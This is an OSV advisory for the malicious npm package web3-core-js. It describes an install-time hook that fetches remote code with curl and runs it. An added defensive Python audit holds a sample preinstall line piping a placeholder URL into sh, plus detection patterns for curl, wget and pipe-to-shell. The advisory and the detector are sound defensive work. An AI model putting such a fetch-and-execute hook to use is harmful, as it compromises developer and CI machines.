MAL-2026-3719

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web3-core-js/MAL-2026-3719.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3719
Published
2026-05-13T11:51:32Z
Modified
2026-05-15T07:51:48.715022Z
Summary
Malicious code in web3-core-js (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (46f9612aaab12b9656a1f1b5fbd7684fdcd57833bbf76d14b2a243f679cb0977)

package.json declares a lifecycle hook that invokes require('child_process') and execSync with a curl command at install time. This pattern fetches remote content and executes it on the installer's machine as part of npm install, before any user code runs. The package name mimics the widely-used web3/web3-core ecosystem while shipping only a lifecycle trigger for remote execution — no library code consistent with the claimed web3 purpose is present. Running npm install web3-core-js on any developer or CI machine results in arbitrary attacker-controlled bytes being fetched and executed with the privileges of the installing user.
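As an added, defensive example that is not part of this advisory or of the OSSF malicious-packages project: a small Python audit that parses a package.json and flags install-time lifecycle hooks whose command matches the fetch-and-execute pattern described above (a remote fetch tool, a child_process shell-out, output piped into a shell, or inline node evaluation). The hook list, the regexes and both sample manifests are my assumptions; the lookalike package name and the example.invalid URL are constructed placeholders, not the real package contents.

```python
"""Audit an npm package.json for install-time lifecycle hooks that fetch and
execute remote content. Added example; not the advisory's or the project's code."""
import json
import re

# npm runs these scripts automatically when the package is installed as a
# dependency, before any of the consuming project's code executes.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators of remote fetch or shell-out inside a script string.
# These are assumptions chosen for the pattern this advisory describes.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b"),
    "child_process": re.compile(r"child_process|execSync|spawnSync"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh|node)\b"),
    "inline_node": re.compile(r"\bnode\s+(-e|--eval)\b"),
}


def audit_package_json(text):
    """Return a list of (hook, pattern_name, script) findings for each lifecycle
    hook whose command matches a suspicious pattern. An empty list means that
    no lifecycle hook in the manifest matched."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append((hook, name, cmd))
    return findings


# Constructed sample manifests (assumptions, not the real package).
# The first mirrors the pattern in the advisory: a lifecycle hook that shells
# out to curl and runs whatever comes back. The URL is a placeholder.
MALICIOUS_SAMPLE = json.dumps({
    "name": "example-lookalike",
    "version": "1.0.0",
    "scripts": {
        "preinstall": "node -e \"require('child_process')"
                      ".execSync('curl -s https://example.invalid/p | sh')\"",
    },
})

# A benign manifest: a postinstall hook that only runs a local script.
BENIGN_SAMPLE = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "main": "index.js",
    "scripts": {
        "test": "node test.js",
        "postinstall": "node scripts/print-banner.js",
    },
})


if __name__ == "__main__":
    for label, sample in (("lookalike", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        findings = audit_package_json(sample)
        print(f"{label}: {len(findings)} finding(s)")
        for hook, name, cmd in findings:
            print(f"  [{hook}] {name}: {cmd}")
```

The audit only reads the manifest, so it can run on a downloaded tarball's package.json before anything is installed. As a blanket mitigation for the install-time class of attack, npm's `ignore-scripts` setting (`npm install --ignore-scripts`, or `npm config set ignore-scripts true` in CI) prevents lifecycle hooks from running at all; packages that genuinely need a build step then have to be allow-listed explicitly.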

Source: ossf-package-analysis (44e1f40536600c94540b0fd722439856b2f118f6090709db7461f5aa06fc2fb4)

The OpenSSF Package Analysis project identified 'web3-core-js' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-13T12:10:45Z",
            "versions": [
                "2.0.0"
            ],
            "sha256": "44e1f40536600c94540b0fd722439856b2f118f6090709db7461f5aa06fc2fb4",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:23.286634175Z"
        },
        {
            "modified_time": "2026-05-13T11:51:32Z",
            "versions": [
                "1.0.0"
            ],
            "sha256": "c0a95589cd0b99b71ac59651cbd59198745377c7812ab23b040f6cb5d8e57710",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:23.870373359Z"
        },
        {
            "modified_time": "2026-05-14T19:25:25Z",
            "versions": [
                "1.0.0"
            ],
            "sha256": "46f9612aaab12b9656a1f1b5fbd7684fdcd57833bbf76d14b2a243f679cb0977",
            "id": "IN-MAL-2026-002722",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:18.083758968Z"
        }
    ]
}
References
Credits

Affected packages

Package: npm / web3-core-js

Affected ranges: 1.*, 2.*

Affected versions: 1.0.0, 2.0.0

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "98eb7c4c2c264f51ed009e166ac42759ba3f12ae963a217346de9d542cacb24f",
            "tlsh": "faf0dc14bf105ab328c19e660a179ace5277c90b40647c58b29fa05c43dcbab14fba5a",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-LKgvmDuz75CrI7g7kNhQnYFEjVqXUoeEm7nNUeRxjsnBozTBJFsVOeZKTrNb7Zz2VTkTcD8QPkPNK30LODPEVg==",
                "sha1": "9b708127c55085dcceecd0b74d78b0fca4e3de1c"
            },
            "filename": "web3-core-js-1.0.0.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web3-core-js/MAL-2026-3719.json"